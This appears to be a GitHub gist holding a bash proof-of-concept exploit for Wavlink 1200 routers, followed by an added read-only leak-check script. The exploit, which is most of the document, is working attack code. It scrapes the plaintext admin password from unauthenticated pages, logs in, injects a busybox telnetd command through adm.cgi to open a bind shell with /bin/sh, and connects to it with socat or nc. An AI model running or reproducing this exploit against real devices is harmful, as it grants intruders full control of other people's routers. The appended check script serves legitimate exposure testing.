@unglitched
Last active December 19, 2020 00:24
This is a PoC/exploit for the Wavlink 1200 Router. It scrapes the admin password from a page the router serves without authentication, logs in with the MD5 of that password, starts a bind shell on the router with busybox telnetd, then connects to it.
#!/bin/bash
# This is a quick POC to auto-pwn WavLink 1200 routers on the local network.
# The router embeds its admin password in plaintext in a JavaScript variable on
# pages that need no login. Alternatives to live_test.shtml:
# sysinit.shtml
# set_safety.shtml
# wifi_region.shtml
HOST=$1
PORT=$2
if [ -z "$HOST" ]
then
    echo "Usage: ./wavpwn.sh host_ip shell_port(optional, default 7331)"
    exit 1
fi
if [ -z "$PORT" ]
then
    PORT='7331'
fi
# Grab pass: fetch the page once, then pull the password and the router's local IP out of it
PAGE=$(curl -s "http://$HOST/live_test.shtml")
PASS=$(printf '%s\n' "$PAGE" | grep "var syspasswd=" | cut -d "\"" -f 2)
LHOST=$(printf '%s\n' "$PAGE" | grep "var localIP=" | cut -d "\"" -f 2)
if [ -z "$PASS" ]
then
    echo "[-] Could not fetch password! Quitting."
    exit 1
else
    echo "[+] Captured password: $PASS"
    # login.cgi takes the MD5 of the password; keep only the 32 hex digits (md5sum also prints "  -")
    HASH=$(printf '%s' "$PASS" | md5sum | cut -d ' ' -f 1)
fi
# Do the thing
echo "[+] Logging in..."
curl -s -X POST -d "page=login&username=admin&ipaddr=$LHOST&hostname=$HOST&password=$HASH" "http://$HOST/cgi-bin/login.cgi" > /dev/null
echo "[+] Setting bind shell on port $PORT..."
# adm.cgi executes the submitted command on the router; URL-decoded: /bin/busybox telnetd -l/bin/sh -p$PORT
curl -s -X POST -d "page=sysCMD&command=%2Fbin%2Fbusybox+telnetd+-l%2Fbin%2Fsh+-p$PORT&SystemCommandSubmit=Apply" "http://$HOST/cgi-bin/adm.cgi" > /dev/null
echo "[+] Connecting to shell at $HOST:$PORT..."
if command -v socat > /dev/null
then
    socat FILE:"$(tty)",raw,echo=0 TCP:"$HOST:$PORT"
else
    echo "[ ] Socat not found, using netcat"
    nc "$HOST" "$PORT"
fi
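As an added example (not part of the gist above), the following script turns the same observation into a read-only check: it probes each of the four listed pages unauthenticated and reports whether any of them leaks the admin password, without logging in or spawning a shell. The sample response body, the page list being exhaustive, and the curl timeout are assumptions made for this example, and the login_hash helper only shows the 32-hex-digit form the PoC sends to login.cgi.

```bash
#!/bin/bash
# Added example, not the gist's code: non-destructive leak check for the
# unauthenticated pages the PoC relies on.

# The four pages the PoC names. Assumption: no others are probed.
PAGES="live_test.shtml sysinit.shtml set_safety.shtml wifi_region.shtml"

# Constructed sample of what an affected page body is assumed to look like,
# so the parsing below can be exercised offline.
SAMPLE_BODY='<html><script>
var localIP="192.168.10.1";
var syspasswd="Secret123!";
</script></html>'

# extract_var NAME: print the quoted value of `var NAME="..."` read from stdin,
# or print nothing if the variable is absent.
extract_var() {
    sed -n "s/.*var $1=\"\([^\"]*\)\".*/\1/p" | head -n 1
}

# login_hash PASS: MD5 of the password as the PoC submits it to login.cgi,
# i.e. just the 32 hex digits, without md5sum's trailing "  -".
login_hash() {
    printf '%s' "$1" | md5sum | cut -d ' ' -f 1
}

# check_body BODY: succeed (exit 0) if the body contains a syspasswd value.
check_body() {
    [ -n "$(printf '%s\n' "$1" | extract_var syspasswd)" ]
}

# check_host HOST: fetch each page without credentials, report leaking pages,
# and return 0 if at least one leaked. Assumed 5-second timeout per request.
check_host() {
    host=$1
    leaked=1
    for page in $PAGES; do
        body=$(curl -s -m 5 "http://$host/$page") || continue
        if check_body "$body"; then
            echo "[!] $host/$page serves the admin password unauthenticated"
            leaked=0
        fi
    done
    return $leaked
}

# Offline demonstration on the constructed sample.
if check_body "$SAMPLE_BODY"; then
    echo "[!] constructed sample leaks: $(printf '%s\n' "$SAMPLE_BODY" | extract_var syspasswd)"
fi

# Probe a real router when an IP is given: ./wavcheck.sh 192.168.10.1
if [ -n "${1:-}" ]; then
    check_host "$1" || echo "[+] $1 did not leak a password on the probed pages"
fi
```

Run it with the router's IP as the only argument; it never posts to login.cgi or adm.cgi, so it is safe to point at your own device to confirm exposure before and after a firmware update.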